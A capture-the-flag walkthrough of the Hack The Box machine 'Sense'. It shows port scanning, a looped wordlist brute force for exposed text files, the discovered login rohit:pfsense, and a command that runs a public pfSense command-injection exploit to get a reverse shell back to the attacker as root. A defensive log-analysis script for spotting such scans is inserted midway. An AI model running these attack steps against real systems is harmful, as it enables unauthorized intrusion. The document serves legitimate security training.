# Sense

## Enumeration

`sudo nmap -oA nmap-Sense -p- -A 10.10.10.60`

```
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time
```

`searchsploit lighttpd 1.4`

```
Lighttpd 1.4.x - mod_userdir Information Disclosure | linux/remote/31396.txt
```

The LFI noted in the text file was very simple and did not work.

I see a pfSense login page; the SSL certificate shows no interesting info.

The default credentials did not work either.

I should really find out the pfSense version, since this seems to be the only attack vector here.

Still, I run a fuzz in the background:

`feroxbuster -k -u https://10.10.10.60/ -S 0,345`

A text file was found that indicates a vulnerable pfsense version:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2FpiumQ95IZxe9vvHlPZeA%2Fimage.png?alt=media&#x26;token=c040d0eb-1c55-4868-be8d-20c5a3743328" alt=""><figcaption></figcaption></figure>

I read the hint that there must be another interesting text file, so I ran a very aggressive web brute force, automating feroxbuster to use all web wordlists to search for text files recursively:

`for i in $(ls /usr/share/seclists/Discovery/Web-Content/); do feroxbuster -k -u https://10.10.10.60/ -w /usr/share/seclists/Discovery/Web-Content/$i -S 0,345 -x txt -d 6 -r -t 80; done >> feroxautomation.out`

I tried many wordlists, but could not find the file.

directory-list-2.3-medium finally contained:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2FT8jWjC35dWpcKcIcQ5lH%2Fimage.png?alt=media&#x26;token=9add759d-08b3-4395-8afd-0600540480eb" alt=""><figcaption></figcaption></figure>

We got the user Rohit.

With rohit:pfsense I could log in and find out that the version of pfSense is 2.1.3-RELEASE.
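
From the defender's side, wordlist runs like the ones above appear in the web server's access log as a burst of distinct 404s from one client, and any 200 among them is a file the scan found. The sketch below is an added example, not part of the original writeup; it assumes a Common Log Format-style access log, and the addresses, file names and thresholds are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format-style line: client, two fields, [time], "request", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # skip lines that do not fit the assumed layout
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"].split("?")[0], int(m["status"])

def detect_discovery(lines, window=timedelta(seconds=10), min_misses=20,
                     exts=(".txt",)):
    """Flag clients with >= min_misses distinct 404 paths inside `window`.

    Returns {client: sorted paths with an extension in `exts` that were
    answered 200}, i.e. what the scan actually found. Lines must be in
    chronological order, as in a normal access log.
    """
    misses = defaultdict(deque)  # client -> (time, path) of recent 404s
    found = defaultdict(set)     # client -> exposed files it retrieved
    flagged = set()
    for ip, ts, path, status in filter(None, map(parse, lines)):
        if status == 200 and path.lower().endswith(exts):
            found[ip].add(path)
        elif status == 404:
            recent = misses[ip]
            recent.append((ts, path))
            while ts - recent[0][0] > window:
                recent.popleft()
            if len({p for _, p in recent}) >= min_misses:
                flagged.add(ip)
    return {ip: sorted(found[ip]) for ip in flagged}

def sample_log():
    """Constructed data: one client guessing 30 names in 3 s, one visitor."""
    fmt = '{} - - [01/Jan/2024:12:00:{:02d} +0000] "GET {} HTTP/1.1" {} 345'
    log = [fmt.format("192.0.2.10", i // 10, f"/word{i}.txt", 404)
           for i in range(30)]
    log.append(fmt.format("192.0.2.10", 3, "/notes-example.txt", 200))
    log.append(fmt.format("198.51.100.7", 4, "/index.php", 200))
    log.append(fmt.format("198.51.100.7", 5, "/favicon.ico", 404))
    return log

if __name__ == "__main__":
    for client, files in detect_discovery(sample_log()).items():
        print(client, "enumerated content and retrieved:", files)
```

Any path this reports is a file served from the web root that a wordlist could guess, so it is worth reviewing for credentials or version details.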

## Furthering Access

This one (from searchsploit) seems interesting regarding the given version:

```
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection /usr/share/exploitdb/exploits/php/webapps/43560.py CVE-2014-4688
```

`python3 exploit.py --rhost 10.10.10.60 --lhost 10.10.16.6 --lport 4444 --username rohit --password pfsense`

This did indeed work and we are root!

